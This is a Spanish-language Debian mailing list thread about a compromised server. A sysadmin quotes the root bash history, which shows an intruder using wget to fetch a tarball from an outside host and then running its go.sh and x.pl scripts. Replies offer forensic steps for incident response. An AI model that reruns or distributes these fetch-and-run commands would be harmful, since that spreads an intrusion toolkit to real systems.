revisa estos enlaces..
http://guias.ovh.es/ServidorHackee
http://guias.ovh.es/ServidorSemihackeado2

http://guias.ovh.es/ServidorSemiHackeado

la información estas diseñada para servidores virtuales..
pero igual te puede ayudar:



Díaz Luis
http://www.facebook.com/diazluis2007
User Linux 532223
progjuegos.com
TSU Analisis de Sistemas
Universidad de Carabobo
Facultad de Odontología <http://www.odontologia.uc.edu.ve/>





El 12 de junio de 2011 14:27, Juan Antonio <[email protected]> escribió:

> El 13/05/11 17:39, ciracusa escribió:
> > Lista, buenas tardes.
> >
> > Perdón si este tema no esta directamente relacionado con Debian, pero
> > como el server en cuestión tiene Squeeze y es un tema de seguridad creo
> > que puede interesarles a mas de uno.
> >
> > Ayer viendo el history de root de un servidor veo lo siguiente:
> >
> >   314  ./go.sh 189
> >   315  w
> >   316  cd
> >   317  cd /var/tmp/
> >   318  rm -rf gosh
> >   319  ls -a
> >   320  exit
> >   321  cat /proc/cpuinfo
> >   322  passwd
> >   323  cd /var/tmp/
> >   324  cd gosh
> >   325  touch bios.txt
> >   326  chmod +x *
> >   327  screen
> >   328  exit
> >   329  cat /proc/cpuinfo
> >   330  cd /var/tmp/
> >   331  ls -a
> >   332  wget http://gblteam.webs.com/gosh.tgz.tar
> >   333  tar zxvf gosh.tgz.tar
> >   334  rm -rf gosh.tgz.tar
> >   335  cd gosh
> >   336  touch bios.txt
> >   337  chmod +x *
> >   338  ./go.sh 200
> >   339  cd
> >   340  cd /var/tmp/
> >   341  ls -a
> >   342  rm -rf gosh
> >   343  ls -a
> >   344  exit
> >   345  cd /var/tmp/
> >   346  perl x.pl
> >
> >
> > Que opinan?
> >
> > Entiendo -lamentablemente- que el server fue comprometido, pero lo que
> > no llego a comprender es el alcance de esto.
> >
> > Notar que puse el link para que puedan descargarlo uds. también y
> > analizarlo (tomando las precauciones del caso).
> >
> > Bueno, si alguien tiene algo de info muy agradecido.
> >
> > Y si pueden recomendarme algunos pasos para analizar la seguridad del
> > server desde ya muchas gracias.
> >
> > Salu2.
> >
> >
>
> El tipo trabaja en /var/tmp asi que probablemente sea porque no tiene
> acceso como superusuario. Haz un ls -l del archivo que subió y mira el
> propietario, asi sabras que usuario es el que tienes comprometido. Y
> como te han dicho revisa los log del sistema para ver como lo hicieron.
>
> Por otra parte, te recomiendan que reinstales sin saber si quiera el
> alcance de la intrusión, yo no lo haría hasta estar seguro que te la
> hayan metido hasta el fondo. Usa ps, lsof, netstat y demas para ver si
> hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr
> para buscar atributos que no deberían tener binarios del sistema como
> ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no
> puedas sustituirlos.
>
> Un saludo.
>
> --
> "Tanto en los deportes como en todo lo demás, soy un experto. Pero para
> mantener viva mi inteligencia natural y fuera de serie, tengo que comer
> mucho"
>
>
> --
> To UNSUBSCRIBE, email to [email protected]
> with a subject of "unsubscribe". Trouble? Contact
> [email protected]
> Archive: http://lists.debian.org/[email protected]
>
>

Responder a